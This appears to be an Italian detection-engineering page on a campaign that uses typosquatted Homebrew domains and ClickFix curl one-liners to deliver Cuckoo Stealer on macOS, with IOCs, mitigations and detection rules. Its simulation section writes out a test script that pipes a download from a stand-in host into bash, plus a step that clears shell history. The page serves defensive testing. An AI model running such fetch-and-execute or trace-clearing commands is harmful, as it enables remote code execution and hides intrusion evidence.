Typosquatting su Homebrew Falsi Usati per Distribuire Cuckoo Stealer tramite ClickFix
Detection stack
- AIDR
- Alert
- ETL
- Query
Riassunto
Il rapporto descrive una campagna che sfrutta domini Homebrew con errori di battitura per indurre gli sviluppatori macOS a eseguire comandi “install” dannosi tramite la tecnica ClickFix. Una one-liner curl appositamente creata invia le vittime a un’infrastruttura controllata dall’attaccante, consegnando un loader per il furto di credenziali seguito dal malware Cuckoo Stealer. Il malware persiste tramite un LaunchAgent, rimuove gli attributi di quarantena ed esfiltra credenziali e dati di portafoglio su HTTPS. La rilevazione dovrebbe concentrarsi sui pattern dei comandi curl e sull’infrastruttura associata.
Indagine
I ricercatori hanno tracciato l’esca iniziale a homabrews.org, risolvendo a 5.255.123.244 nei Paesi Bassi e ospitando più domini simili (incluso raw.homabrews.org usato per la consegna). Lo script scaricato esegue un loop di autenticazione dscl per convalidare le credenziali macOS, quindi recupera un binario chiamato brew_agent. Nella seconda fase, Cuckoo Stealer crea un plist LaunchAgent, rimuove i flag di quarantena e comunica con il C2 usando lo scambio di chiavi X25519 con payload crittografati con XOR. La caccia all’infrastruttura ha rivelato una rete di almeno sei domini che condividono lo stesso IP di hosting.
Mitigazione
Educare gli sviluppatori a verificare gli URL di installazione di Homebrew e a evitare di copiare e incollare comandi non attendibili nel Terminale. Abilitare la registrazione dei comandi da riga e limitare i pattern in cui curl recupera script remoti per l’esecuzione immediata, specialmente gli one-liner “curl | sh”. La protezione degli endpoint dovrebbe allertare sulla creazione sospetta di LaunchAgent e sulla rimozione degli attributi di quarantena. Le difese di rete dovrebbero bloccare i domini dannosi noti e segnalare il traffico verso raw.homabrews.org e host correlati.
Risposta
Quando viene rilevato un comando curl sospetto, isolare l’endpoint, catturare lo script e il binario brew_agent, e raccogliere il plist LaunchAgent per l’analisi. Reimpostare le credenziali rubate e revocare i token compromessi, specialmente per browser, Keychain e portafogli di criptovaluta. Esaminare forensicamente la directory nascosta BrewUpdater, eventuali collegamenti creati e rimuovere i file dannosi. Aggiornare le rilevazioni con gli IOC estratti e monitorare il riutilizzo della stessa infrastruttura.
Flusso di Attacco
Rilevazioni
Attività Sospetta su Keychain (via process_creation)
Visualizza
Modifica Sospetta dei Permessi dei File nella Cartella Tmp di MacOS (via cmdline)
Visualizza
MacOS Sospetto – Posizioni e Nomi dei Plist (via file_event)
Visualizza
Accesso Sospetto a Credenziali Salvate nei Browser su MacOS (via process_creation)
Visualizza
Il Volume di Sistema MacOS è Stato Mutato Usando Osascript (via cmdline)
Visualizza
Possibile Raccolta Tramite Tentativo di Esecuzione di MacOS Screencapture (via cmdline)
Visualizza
Tentativo Sospetto di Esecuzione di Curl [MacOS] (via cmdline)
Visualizza
IOC (HashSha256) da rilevare: Typosquats Falsi di Homebrew Usati per Consegnare Cuckoo Stealer tramite ClickFix
Visualizza
IOC (SourceIP) da rilevare: Typosquats Falsi di Homebrew Usati per Consegnare Cuckoo Stealer tramite ClickFix
Visualizza
IOC (DestinationIP) da rilevare: Typosquats Falsi di Homebrew Usati per Consegnare Cuckoo Stealer tramite ClickFix
Visualizza
Rilevazione del Comando di Installazione MacOS Malevolo via ClickFix [Creazione Processo Linux]
Visualizza
Rilevazione di Dominio con Errori di Digitazione e IP Maligno nella Campagna ClickFix [Indicatori di Rete]
Visualizza
Esecuzione della Simulazione
Prerequisito: Il Controllo Pre-volo di Telemetria e Baseline deve essere passato.
Motivazione: Questa sezione descrive l’esecuzione precisa della tecnica avversaria (TTP) progettata per attivare la regola di rilevazione. I comandi e la narrativa DEVONO riflettere direttamente le TTP identificate e mirano a generare esattamente la telemetria prevista dalla logica di rilevazione. Esempi astratti o non correlati porteranno a misdiagnosi.
-
Narrativa dell’Attacco & Comandi:
Un attaccante ha ottenuto uno script PowerShell codificato dannoso ospitato su un server C2. Per evitare di scrivere file su disco, l’attaccante fluisce lo script direttamente in una shell Bash usandocurl -fsSLe il-cflag. Il comando viene eseguito interattivamente da un account utente compromesso, imitando un installer “click-fix” legittimo. I passaggi sono:- Risolve l’URL del payload dannoso (e.g.,
https://evil.example.com/payload.sh). - Pipe il download in Bash, istruisce Bash a eseguire il contenuto con
-c. - Il payload esegue il furto di credenziali, crea un file nascosto e poi cancella lo script temporaneo (coprendo T1070.004).
- Risolve l’URL del payload dannoso (e.g.,
-
Script di Test di Regressione:
#!/usr/bin/env bash # ------------------------------------------------- # Simula un installer macOS malevolo (stile ClickFix) # ------------------------------------------------- set -euo pipefail MALICIOUS_URL="https://evil.example.com/payload.sh" # Fluisce il payload direttamente in Bash con -c curl -fsSL "$MALICIOUS_URL" | /bin/bash -c "$(cat)" # Si assume che il payload stesso esegua le sue azioni dannose. # Per lo scopo del test, semplicemente emettiamo un marcatore. echo "Payload dannoso eseguito" -
Comandi di Pulizia:
# Rimuovere eventuali file che potrebbero essere stati creati dal payload rm -f /tmp/payload.sh # Opzionalmente, cancellare la cronologia dei comandi per ridurre le tracce forensi history -c